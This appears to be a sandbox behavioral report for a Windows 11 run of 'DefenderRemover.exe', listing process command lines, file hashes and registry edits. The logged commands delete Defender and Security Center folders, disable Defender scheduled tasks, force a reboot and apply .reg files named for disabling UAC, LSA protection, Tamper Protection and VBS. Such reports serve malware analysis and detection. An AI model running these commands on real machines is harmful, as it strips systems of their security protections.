"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\WebThreatDefSvc"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\WebThreatDefSvc"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\amd64_security-octagon*"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\amd64_security-octagon*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\amd64_windows-defender*"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\amd64_security-octagon*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\amd64_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\wow64_windows-defender*"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\WinSxS\amd64_security-octagon*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\wow64_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\x86_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\amd64_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\wow64_windows-defender*"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\WinSxS\amd64_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\x86_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\bcastdvr"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\WinSxS\wow64_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\x86_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\bcastdvr"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\WinSxS\x86_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\bcastdvr"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy"
C:\Windows\SysWOW64\timeout.exe
timeout /t 5 /nobreak
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\bcastdvr"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /f /t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3970055 /state1:0x41c64e6d
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K ISOCreator.cmd
Network
Files
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Script_Run.bat
| MD5 | cb6ba01b02a759691ccce25812a01fbe |
| SHA1 | 3dc6450d1d0d92b34a8bbf891d5895d916dfa286 |
| SHA256 | 7799b4f070f70a1ba829e49dadbb4708a632d8db41510828b50b8826a669b6c3 |
| SHA512 | 871b05706dd8e9de355873236a592621e2a5dfca694154d2c86411499d0b2300cc6cfc7c62a8dd998ef901934349d725d34405250d6cbca49f9c9e63b316b126 |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\TKL.txt
| MD5 | a3821e2c9d825fa76ec3b4088db3008c |
| SHA1 | bcffb9aa475249758f657d80dc820f33db3b13e4 |
| SHA256 | 614508189b6307dedb9f1f23773ae9f5abe34a93ef657f6333a4c75a5cd3d455 |
| SHA512 | 4ec925391282451ae9b79e2c47d804e131573191358f153f5a886877bfb6bc71bd778fc63b4efd1033cd3d4727bdf7d96f6c99aae076689db5ed5de511a713d7 |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
| MD5 | fc1fb033d57f72089fb4762245a8b18d |
| SHA1 | 7ec0f7ca5f0e0d20e5372bf69865d0a809e6cc8e |
| SHA256 | a6fa768c4964c328c748558627c20c2ba455e589a1b87cfa3911d197da1688d2 |
| SHA512 | cff3833e592a5fe1f1fcb656c42e77fdd177c902f84cf396365cfa04edc9ec046de3473a943779d3815bc36bf48182101703b20b08ae580c2b3ba20508d231d0 |
C:\Users\Admin\AppData\Local\Temp\4v2k6c8e.tmp
| MD5 | 9e7bb9c31083cc3a0f561d12311c9d83 |
| SHA1 | 9102b88339566d5f0490c25180632043c8bb1809 |
| SHA256 | 2658178fd2cb498195032c531bf3bb037954e0614aaec4c4ac2637f08d949bc1 |
| SHA512 | 1fb30279a1f951a98f609eb749deb6c77082c28a30e1fdd4f3224ddac8ddfad134e8f3c44f82c32501da8a93a978e6cf8dfe591039a0e6af0d4d2a1dc5445699 |
C:\Users\Admin\AppData\Local\Temp\aut6D68.tmp
| MD5 | 96c0e61f3298cb745b021f67e7dd0d48 |
| SHA1 | a61adbe460c68a3087ff1ba75620dbb86af28e40 |
| SHA256 | 3e56c22a81ab1168036a289c7ffe2889dd678c422568dff9ef91d6a0f9005333 |
| SHA512 | dbbfdd4ad2c80ff9df0b21dfd011420baba54a7114d0e0ff5371dda9c9389d90422a4311881ac2bdb5ba7c4334d210b61c6c0fc691ae503e32930109d9251f3e |
C:\Users\Admin\AppData\Local\Temp\aut6D67.tmp
| MD5 | 09ca17eb552722bd7004097f59b07518 |
| SHA1 | 36cf9da188460542e58acb97fa0ef0bfd9a4e172 |
| SHA256 | 365c32c3c09228158ab5aaabfcf93cdfcd858be0b2a00031d82ab03070f61a5b |
| SHA512 | 3dc6ed86df50f87b12635032fb30840e94bea699ac193a16099a2ce1a9bd5e39147f115fb938c177991dc0dcfd5abab075632a1d0b46e6009a86eea3a27156bf |
C:\Users\Admin\AppData\Local\Temp\aut6D56.tmp
| MD5 | 4a83df1d945c2f5801ed59650d7460eb |
| SHA1 | 31827890e1df99268c0f80dcb26774225e4c3a5d |
| SHA256 | 2d993be76dfcf35f89b656b4dbc553e078d824974b482e56c6f76eaea87731c8 |
| SHA512 | eacb88683e3c999a1cdc9d9e4a4030723164e358d7cd85f7cfc02b99f33be991c89af5602349b48b5388520968a43a2a45b4b6d2f468f2b888088cf95bd591d2 |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Antivirus_d.reg
| MD5 | 1c4f1e55ebcf0c69f51770659aa94ed2 |
| SHA1 | 2d4709259ec91bbd1e45cadf875674d5c7c3b141 |
| SHA256 | 1766088a7e6094853879d3f9b71b911adf266b021518739ea7edd305a364f9cc |
| SHA512 | 269d73507c56716a038fc6de382147479ca65dfb8d71150178c2adddbb905ebac05f6ec226b76c74c74a6e1f71179942b16036d93dd9ffdba76ba9b948118a56 |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Defender Anti-Phishing_d.reg
| MD5 | 1d42f1e28598df25a538212f19c72f7c |
| SHA1 | ec7875ab57b0323dd1ec73990208fb82ddfe8aec |
| SHA256 | e3755e8b93c4a9a664585ce1235de7e2835d57f393a0c8f35a2a09becb37fdc8 |
| SHA512 | 1d03a5d9fc51ea52f47fcbd6b1a18b6d19965cff656c0847ef486d1bcf13a413f872e21f80790899f30b420b8f43fda501405c9c911365cf520f5441e1b27345 |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender and Security Center Notifications.reg
| MD5 | 0fcac91dc53c55aff3ede0ba3c969c1f |
| SHA1 | e7b38459815175d4f564be47550e313df292d025 |
| SHA256 | 2f3ca3f723868d3f7d192f0c3ccf41646727924bafbd1afef323d1c7ea03a6ee |
| SHA512 | d7a461d0a81c3555cd25583a529454140402322fffaac7638bea3b1d14a36ad93f5a8994d7b9c678bb4c92596bf6a4ddfab9d224ac282ff66d0fa547b3da004c |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender Policies.reg
| MD5 | 1c47710a69e61b9c68da2629c3ef5d33 |
| SHA1 | f8602e5d45939acab7e0790d5b3d6d48164ab5de |
| SHA256 | 68dad1d7067bb7ac3b983866843ed71c46656e0918d5139241bb6d702516481f |
| SHA512 | 4c4105923b485a739884263315a4c20b24256a9f77a75ffefca9ce095dce61b172cb2792744bec24ec4e8ba5daad3d5a603fe1cc166d156867a5ec36659499ca |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable LSA Protection.reg
| MD5 | eba762017ab33c896ea6b4aebc13c8ca |
| SHA1 | 9b4b1c5bd8244b84c22f9a5b581656099e36f8f8 |
| SHA256 | e71ce14cf0e4f74fe758ba3cfa45b41da96bf8fdd8b34ef0a50867bc77252f65 |
| SHA512 | 67298e2a0405e3431424398a7c3a84c6e84b45f32f5eec8d13fd9b703be04945a6c819404bcb7b9d6e1e5d88311f90e1772bf89d23b5a556e12ba0a3afc595aa |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Microsoft Vulnerabile Driver Blocklist.reg
| MD5 | efc53212201c2dfc033dd1f86fccab58 |
| SHA1 | 3e539ce67bca171b2cf16c2dfc84f8555e87e8a6 |
| SHA256 | 555e773f0cbc2178e71259bc42ac325761841f25ef6ce4eb9ce6bc9f55176f64 |
| SHA512 | 3bcc15b08325921358d9a6113e0a8f08cefd7093e4927aeb2bb2fed4761ffd539c6ea9358101044dc0d443b9e79c69ad7f582300b0da894ace075b549e023479 |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable SmartScreen.reg
| MD5 | 1661861b318233ac53a0953f4a275cac |
| SHA1 | 1fc9ffc2a2950789ad819144f7ae7057cf74e3ca |
| SHA256 | 8bb02edc6439c86df129e788f9e7fe040495c53d20f20cbc02000652ffe937bd |
| SHA512 | 79e0c27ed1e9e0025a06f36350f83e7de272c317b187f0fab1f6c66f616e56c3564360144e593547ac8880d999088fa73f806c39b0062a0771464865bb0abae0 |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable System Mitigations.reg
| MD5 | e4220360e737bed4df1640534e9e345a |
| SHA1 | a83b9f02aaee8627dfac48626ea4557bf974b325 |
| SHA256 | 139f7c8501cd25533ff334fdce6c013f324785ffb93fd1b860179a1e858efba2 |
| SHA512 | 00e2ed327a49ac7a8362e13f7d7f28d11920d140e080fcce8f9c4397a94911a5facb4cd9db9586f7a2557dfe54715d48558a6c887e532477ad6e269b1db5d33b |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Tamper Protection.reg
| MD5 | beecaa85e83f9052c97dcf6b0d8b4184 |
| SHA1 | 1148b8338f59089d89c1adfeaace3029baef6bf6 |
| SHA256 | 5d4e27dcf768cdc6d4a57e210d6a7eba0421ea2f07ba8478b00fc54c70cfd2b4 |
| SHA512 | f61092b7a33d575a3c9ac037dee9625377890dd9396d13cee3630cef6509eba9580f4007338d723a2928813ee79c362e21477a4dea03c09b1cf310168a7f3022 |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable UAC.reg
| MD5 | 3836b29a8f1e1159d16903d9dd68328b |
| SHA1 | 9a0ea618c87b4d7dfc22998703c4548cd5931b26 |
| SHA256 | aa9d5c0d4d838ca2c72603c362b2801e6b1d93e5f02de5ab206242ba7d651bf0 |
| SHA512 | 2232c915b242336170e8fe283cc0b677042b29d141668f0da0c05397c6fa73eda789b7d02e0e0734801f09fb24a316245b38a804a3ed612b7add6cd81dd8226d |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable VBS.reg
| MD5 | 100a4747bdac7a56abc65999306beee8 |
| SHA1 | 1aa56ebcf777e16cf86ae40d0172923ef6e425fa |
| SHA256 | 63da8d9265fe123abca5c440dd6279eca998c2a4d06f1cc0517702efeb2a9168 |
| SHA512 | 4b944469fc120373d558c0270d6d421415f56e679d79caba00e8fd904434b89682781f2ac75d2f6dac7e5e345c78d3f0ef9f3918b2d5c97ad3ba7593285143e8 |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Exploit Guard_d.reg
| MD5 | 0d63b759c955a1b36e2b742c62e830be |
| SHA1 | 580ea3018a5056885cff7725a5c933453e2624bd |
| SHA256 | 03ea2c1e2003a80a8515b2795c075535c76791539ec71fe38719bbaa48426789 |
| SHA512 | 0607728b2328a9b09598ac7af46f2b016bac70bedced1959315e83d91eee2c41d978d2339ce05af473b7cd636ce0869a38067811b21692fd05ca992810803f1b |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\LockDown Windows Defender Security Center.reg
| MD5 | 33076233407217cb152cdfe4e9a9dfe6 |
| SHA1 | 70a9ea73d1bf97c6f31835d92e4c548b60b7fcdf |
| SHA256 | b0c4a3957097dac5d2c8c5abab5e5e2d0d853ada3721dbdaafbf55725fe4dab4 |
| SHA512 | 719663440497f1964832ee82323caf24d72d1d8dc14da4231a43db79b24ac5c785790fa6e2052dfbe1f0aebf8252ab67ec878f141420172744a1fc2fc39b50ea |
C:\Windows\Temp\1h1x2x8r.tmp
| MD5 | db2eb3078f924bc0049ae6e98653f2b0 |
| SHA1 | fc058c55c2b670dea826418aebc602ad737f6285 |
| SHA256 | f37b5230deb0e25cd3721e8b6653036b26dde8c7d567e4639458192daacef9f7 |
| SHA512 | dca8ec245c856def9ff56536537b91456c967966939e94b602c085282ebbe5c95e12bb9f48772d3dbd43087ce3317debdc87bf635f3972b048ea4ec811d1b50a |
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Mitigation of Fault Torelant Heap.reg
| MD5 | 0ff39ff66d673e99a93863e57369c637 |
| SHA1 | 5c2df38b0af7578f13662f4dabd2f32e5db5b538 |
| SHA256 | 86a7444b738afc41846e7ae1f12c4cb48915cc34177a41544d7cdbe2c6425aef |
| SHA512 | b5ae4b2c85c5a1e60ba64ba98114750ffb6d5b101773cc309cdcb5a24eff76ba87266632aea7d8dc5964d240e6eec4662d23216424a19fb5dc90056f9e2422ab |
C:\Users\Admin\AppData\Local\Temp\0llt8r0x.tmp
| MD5 | 1524a28cbc30e70c60bc6cf977f82229 |
| SHA1 | 664f15cea146b654ec4a60c76071ff83c4dfa651 |
| SHA256 | 8561191653adc4ee6cb03a5c1953bd993782689600adebcd8776754147668f9b |
| SHA512 | 7fbee3bc38aca8ef368c1ff07eb1f4fb3f178628f8b41430eb1006c63bd908f26a1d85a19f2d661b02d3842505c9c762c8056fb2f1619b92a3a6d1085f0b9c50 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
144s
Max time network
157s
Command Line
Signatures
Executes dropped EXE
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ndfapi.dll,-40001 = "Windows Network Diagnostics" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "183" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Tutorial\DefenderRemover.exe
"C:\Users\Admin\AppData\Local\Temp\Tutorial\DefenderRemover.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c .\Script_Run.bat
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
PowerRun.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
PowerRun.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
PowerRun.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" /TI/ schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" /TI/ schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
PowerRun.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" /TI/ schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "DisablerS\Disable.reg"
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" /TI/ schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
